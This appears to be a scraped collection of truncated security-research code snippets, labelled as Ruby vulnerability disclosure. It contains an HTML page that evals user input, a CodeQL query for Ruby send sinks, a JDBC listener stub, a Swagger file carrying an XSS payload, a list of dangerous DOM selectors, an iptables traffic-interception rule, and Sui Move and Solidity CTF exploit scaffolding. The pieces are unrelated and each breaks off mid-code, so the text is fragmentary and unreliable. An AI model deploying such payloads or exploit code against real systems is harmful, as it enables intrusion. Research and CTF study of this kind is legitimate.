原文: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
分类: 漏洞披露-Ruby
| <html> | |
| <head> | |
| <title>JavaScript Execution</title> | |
| <script> | |
| function executeCode() { | |
| const input = document.getElementById('inputCode').value; | |
| const output = document.getElementById('outputResult'); | |
| try { | |
| const result = eval(input); | |
| output.textContent = result; |
| // send 需要2 参数可控 | |
| // public_send 需要 3 参数可控 | |
| // (1) todo 对参数本身的类型检查 | |
| // (2) todo 对方法本身的检查 | |
| // (3) 对 location的检查, 去除 _spec.rb, _example.rb, 直接删除然后构建 database | |
| import codeql.ruby.DataFlow | |
| from DataFlow::CallNode call | |
| where | |
| call.getNumberOfArguments() = 2 and |
| import struct | |
| import asyncio | |
# Base URL the target's JDBC client is expected to fetch from this listener
# (per the original note, the client ends up requesting
# http://127.0.0.1:1881/.well-known/openid-configuration).
# NOTE(review): a loopback address only works when the JDBC client runs on
# this same host; a remote target needs an address it can actually reach.
url = "http://{host}:{port}/".format(host="127.0.0.1", port=1881)
| # 自动化拼接字符串 | |
| # 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行 |
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "description": "<select><template><img src=x onerror=alert(1)></template></select>", | |
| "version": "1.0.6", | |
| "title": "Swagger Petstore", | |
| "termsOfService": "11", | |
| "contact": { | |
| "email": "[email protected]" | |
| }, |
| dom.querySelector("script") || | |
| dom.querySelector("svg") || | |
| dom.querySelector("meta") || | |
| dom.querySelector("x") || // todo: x:script | |
| dom.querySelector("object[data]") || | |
| dom.querySelector("iframe[src]") || | |
| dom.querySelector("iframe[srcdoc]") || | |
| dom.querySelector("embed[src]") || | |
| dom.querySelector("base[href]") || | |
| dom.querySelector("form[formaction]") || |
# Transparent-proxy hook for a single Linux user: in the nat table's OUTPUT
# chain, TCP traffic generated by processes running as uid 2000 and bound for
# port 80 or 443 is DNATed to an interceptor listening on 127.0.0.1:8080.
# "! -d 127.0.0.1" leaves that uid's direct loopback connections alone.
# NOTE(review): the interceptor on :8080 must NOT run as uid 2000 — its own
# upstream connections to 80/443 would match this rule and loop back into it.
# NOTE(review): redirected 443 traffic is only readable if the client trusts
# the interceptor's CA; otherwise the client just sees TLS failures.
# -p tcp must precede -m multiport (multiport refuses to load without a proto).
iptables -t nat -A OUTPUT -m owner --uid-owner 2000 -p tcp ! -d 127.0.0.1/32 -m multiport --dports 80,443 -j DNAT --to-destination 127.0.0.1:8080
| // code : https://github.com/movebit/movectf-6 | |
| // sui move build --dump-bytecode-as-base64 --path . | |
| // sui client publish --path ./ --gas-budget 30000 | |
| module c6::exp { | |
| use ctf::hero; | |
| use ctf::adventure; | |
| use sui::tx_context::TxContext; | |
| public entry fun start( | |
| h: &mut hero::Hero, ctx: &mut TxContext | |
| ): () { |
| pragma solidity ^0.8.7; | |
| interface Target { | |
| function profit() external; | |
| function guess(uint guess_secret) external; | |
| function transfer(address to, uint amount) external; | |
| function payforflag(string memory md5ofteamtoken,string memory b64email)external; | |
| function withdraw(uint amount) external; |